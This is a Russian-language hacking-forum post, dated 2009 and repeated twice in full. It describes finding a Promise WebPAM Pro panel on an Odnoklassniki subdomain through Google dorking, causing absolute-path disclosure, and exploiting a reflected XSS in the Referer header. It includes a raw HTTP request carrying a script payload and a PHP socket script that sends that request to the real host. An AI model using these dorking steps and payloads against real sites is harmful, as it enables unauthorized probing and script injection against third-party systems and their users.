mghack
23.04.2009, 23:08
Решил я как то погуглить по одноклашкам
google.com
site:odnoklassniki.ru -www -rabota -std -mg2 -mg1 -.....
в результате большенство основных линков отсеилось и моему взору предстала интересная ссылка
http://c4.odnoklassniki.ru/
там доступ к ститеме webpam pro
(вот сайт производителя http://www.promise.com/support/download/download2_eng.asp?category=all&os=100&productID=121)
перейдя по ссылке http://c4.odnoklassniki.ru/contact.php увидел
раскрытие абсолютных путей )))
немного поэкспирементировав с параметрами в посылаемом http запросе я получил следующее
session_start(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /islavista/sw/php/promise/language.php on line 15
Notice: Undefined offset: 1 in /islavista/sw/php/promise/language.php on line 24
Notice: Undefined index: HTTP_REFERER in /oem/sw/gui/languages/en_US_Contact.html on line 189
Notice: Undefined index: HTTP_REFERER in /oem/sw/gui/languages/en_US_Contact.html on line 191
опа, па !
ага, значит посмотрим http://c4.odnoklassniki.ru/languages/en_US_Contact.html
http://c4.odnoklassniki.ru/languages/en_US_Contact.html
видим кусок php кода который в этом html
<?
if(preg_match('/index.php/',$_SERVER['HTTP_REFERER']))
echo '<tr><td><a href="'.$_SERVER['HTTP_REFERER'].'">Back</a></td><td></td></tr>';
if(preg_match('/help/',$_SERVER['HTTP_REFERER']))
// echo '<tr><td><a href="'.$_SERVER['HTTP_REFERER'].'">Back</a></td><td></td></tr>';
echo '<table><tr><td><img src=help/helpImages/ball-back.gif></td><td><a href=javascript:history.back()>Go Back</a></td></tr></table>';
?>
интересно, значит можно послать http запрос с xss в реферере
GET /contact.php HTTP/1.1
Host: c4.odnoklassniki.ru
User-Agent: *
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: /index.php/"><script>alert(0);</script>
вот как вариант запрос
вот реализация на php
<?php
$res = '';
$sock=fsockopen('c4.odnoklassniki.ru',80, $errno, $errstr, 30);
if(!$sock)
{
echo $errstr($errno);
}else{
$headers = "GET /contact.php HTTP/1.1\r\n";
$headers .="Host: c4.odnoklassniki.ru\r\n";
$headers .="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)\r\n";
$headers .="Accept-Language: en\r\n";
$headers .="Referer: /index.php/\"><script>alert(123)</script>\r\n";
$headers .="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n";
$headers .="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n";
$headers .="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n";
$headers .="Cache-Control: no-cache\r\n\r\n";
}
fwrite($sock, $headers);
while(!feof($sock)){
$res .=fgets($sock, 1024);
}
echo $res;
?>
Вот такие бывают вещи.
актуальность 21.04.2009
google.com
site:odnoklassniki.ru -www -rabota -std -mg2 -mg1 -.....
в результате большенство основных линков отсеилось и моему взору предстала интересная ссылка
http://c4.odnoklassniki.ru/
там доступ к ститеме webpam pro
(вот сайт производителя http://www.promise.com/support/download/download2_eng.asp?category=all&os=100&productID=121)
перейдя по ссылке http://c4.odnoklassniki.ru/contact.php увидел
раскрытие абсолютных путей )))
немного поэкспирементировав с параметрами в посылаемом http запросе я получил следующее
session_start(): The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /islavista/sw/php/promise/language.php on line 15
Notice: Undefined offset: 1 in /islavista/sw/php/promise/language.php on line 24
Notice: Undefined index: HTTP_REFERER in /oem/sw/gui/languages/en_US_Contact.html on line 189
Notice: Undefined index: HTTP_REFERER in /oem/sw/gui/languages/en_US_Contact.html on line 191
опа, па !
ага, значит посмотрим http://c4.odnoklassniki.ru/languages/en_US_Contact.html
http://c4.odnoklassniki.ru/languages/en_US_Contact.html
видим кусок php кода который в этом html
<?
if(preg_match('/index.php/',$_SERVER['HTTP_REFERER']))
echo '<tr><td><a href="'.$_SERVER['HTTP_REFERER'].'">Back</a></td><td></td></tr>';
if(preg_match('/help/',$_SERVER['HTTP_REFERER']))
// echo '<tr><td><a href="'.$_SERVER['HTTP_REFERER'].'">Back</a></td><td></td></tr>';
echo '<table><tr><td><img src=help/helpImages/ball-back.gif></td><td><a href=javascript:history.back()>Go Back</a></td></tr></table>';
?>
интересно, значит можно послать http запрос с xss в реферере
GET /contact.php HTTP/1.1
Host: c4.odnoklassniki.ru
User-Agent: *
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: /index.php/"><script>alert(0);</script>
вот как вариант запрос
вот реализация на php
<?php
$res = '';
$sock=fsockopen('c4.odnoklassniki.ru',80, $errno, $errstr, 30);
if(!$sock)
{
echo $errstr($errno);
}else{
$headers = "GET /contact.php HTTP/1.1\r\n";
$headers .="Host: c4.odnoklassniki.ru\r\n";
$headers .="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)\r\n";
$headers .="Accept-Language: en\r\n";
$headers .="Referer: /index.php/\"><script>alert(123)</script>\r\n";
$headers .="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n";
$headers .="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n";
$headers .="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n";
$headers .="Cache-Control: no-cache\r\n\r\n";
}
fwrite($sock, $headers);
while(!feof($sock)){
$res .=fgets($sock, 1024);
}
echo $res;
?>
Вот такие бывают вещи.
актуальность 21.04.2009